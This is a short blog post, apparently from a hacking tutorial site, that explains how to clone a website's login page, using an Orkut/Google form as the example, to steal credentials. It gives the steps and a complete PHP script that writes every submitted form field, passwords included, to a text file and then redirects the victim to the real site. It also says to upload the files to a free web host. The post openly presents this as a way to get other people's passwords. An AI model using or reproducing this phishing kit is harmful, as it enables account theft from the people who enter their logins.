??Tutorials:how to make fake page of any webpage
??Tutorials:how to make fake page of any webpage
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)
so lets start now:-
first of all u need to know the source code of the website of which u want fake page
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)
now open ur urpage.html n search for :
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=orkut" method="post"
onsubmit="return(gaia_onLoginSubmit());">
firstly copy the text in blue n remember it u ll need it in ur php file
replace the text in blue with ur php filename like orkut.php
ur php file:
<?php
header ('Location: blue text here ');
$handle = fopen("login.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
now replace the text "blue text here" with the blue text from above
n now save the php file as orkut.php
now make a login.txt file which would be a blank file
now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)
now u all r thinking dat how will i get the passwords?????
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost
so now enjoy ur new fake webpage
No comments:
Post a Comment